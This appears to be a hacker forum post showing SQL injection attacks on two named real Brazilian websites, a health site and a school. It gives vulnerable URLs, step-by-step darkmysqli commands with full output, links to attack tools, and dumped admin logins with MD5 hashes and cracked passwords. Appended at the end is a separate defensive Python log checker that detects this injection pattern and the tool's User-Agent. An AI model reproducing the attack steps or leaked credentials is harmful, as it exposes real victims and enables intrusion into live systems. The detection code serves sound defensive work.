POC
For http://www.medicor.com.br I used ExploitMyUnion_windows.py; it is used the same way as sql helper 2.7. If you want to try it, it is here: http://darkc0de.com/others/ExploitMyUnion_windows.py
POC:
vuln = http://www.medicor.com.br/?pag=dicas_de_saude&id=1
e10adc3949ba59abbe56e057f20f883e >>> 123456
For http://www.colegiosantarosa-maceio.com.br I used darkmysqli, which is available at http://darkc0de.com
vuln: http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218
POC:
Step 1:
darkmysqli.py -u "http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218" --findcol
Result:
darkMySQLi URL: http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6--
Step 2:
darkmysqli.py -u "http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6" --full
Result:
[+] URL: http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6
[+] 23:03:19
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: santa_santa
User: santa_santa@localhost
Version: 5.0.89-community
[+] Number of Rows: 144
[Database]: santa_santa
[Table: Columns]
[1]admin_grupos: cd_grupo,ds_grupo,cd_grupo_pai,tabela,has_filho
[2]admin_log: cd_log,usuario,modulo,operacao,dthr
[3]admin_nivel_acesso: cd_nivel_acesso,ds_nivel_acesso
[4]admin_permissao: cd_grupo,cd_user,cd_nivel_acesso
[5]admin_users: cd_user,nome,sis_login,sis_senha,funcao,dthr_ultimologin,ordem
Since I had already found the admin table, [5] admin_users, I stopped there to save time.
Step 3:
darkmysqli.py -u "http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6" --dump -D santa_santa -T admin_users -C sis_login,sis_senha
Note: -D = the database
-T = the table name
-C = the field name
Result:
[+] URL: http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6
[+] 23:09:51
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: santa_santa
User: santa_santa@localhost
Version: 5.0.89-community
[+] Dumping data from database "santa_santa" Table "admin_users"
[+] Column(s) ['sis_login', 'sis_senha']
[+] Number of Rows: 3
[1] antonio:26bf2cf7dc6058466bd3e8e4face7f71 >>>> toinho
[2] santarosa:e10adc3949ba59abbe56e057f20f883e >>>> 123456
[3] junior:2c7cd3f647bf3ce10314e0eb5469d2ad >>>> 0339
Sorry if anything is missing or wrong; please bear with me, I'm a newbie, bro.
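
Added example, not part of the original post: a Python check that flags, in web server access logs, the request pattern visible in the tool output above (the `AND 1=2 UNION SELECT` probe, the repeated marker string in the column list, and the tool's User-Agent). The log lines, IP addresses and the /page.php path are constructed samples, and the Combined Log Format is an assumption about the server.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
UNION_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)
FALSE_RE = re.compile(r'\band\s+(\d+)\s*=\s*(\d+)', re.I)
# User-Agent string shown in the tool output on this page.
TOOL_AGENT = "Microsoft Internet Explorer/4.0b1 (Windows 95)"

def classify(line):
    """Return (client_ip, [reasons]) for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, agent = m.groups()
    query = unquote_plus(target.partition("?")[2])  # '+' and %20 both become spaces
    reasons = []
    if UNION_RE.search(query):
        reasons.append("union-select")
        # Column probing repeats one non-numeric marker across the SELECT list.
        tail = UNION_RE.split(query, maxsplit=1)[1].split("--")[0]
        cols = [c.strip().lower() for c in tail.split(",")]
        if any(c and not c.isdigit() and cols.count(c) >= 2 for c in cols):
            reasons.append("repeated-marker")
    f = FALSE_RE.search(query)
    if f and f.group(1) != f.group(2):  # e.g. AND 1=2 forces the original row set empty
        reasons.append("always-false-predicate")
    if agent == TOOL_AGENT:
        reasons.append("tool-user-agent")
    return ip, reasons

def flagged(lines):
    """Map client IP -> sorted reasons for every line that raised at least one signal."""
    hits = {}
    for line in lines:
        result = classify(line)
        if result and result[1]:
            hits.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(r) for ip, r in hits.items()}

SAMPLE_LOG = [  # constructed sample lines, documentation-range IPs
    '203.0.113.7 - - [10/Oct/2010:23:03:19 +0000] "GET /page.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6-- HTTP/1.1" 200 5120 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"',
    '198.51.100.4 - - [10/Oct/2010:23:04:02 +0000] "GET /page.php?id=218 HTTP/1.1" 200 4890 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [10/Oct/2010:23:05:40 +0000] "GET /page.php?id=5%20uNiOn%20SeLeCt%201,2,3 HTTP/1.1" 200 4890 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    print(flagged(SAMPLE_LOG))
```

The User-Agent match is the weakest of the four signals because a client can set any value; the query-string checks do not depend on it.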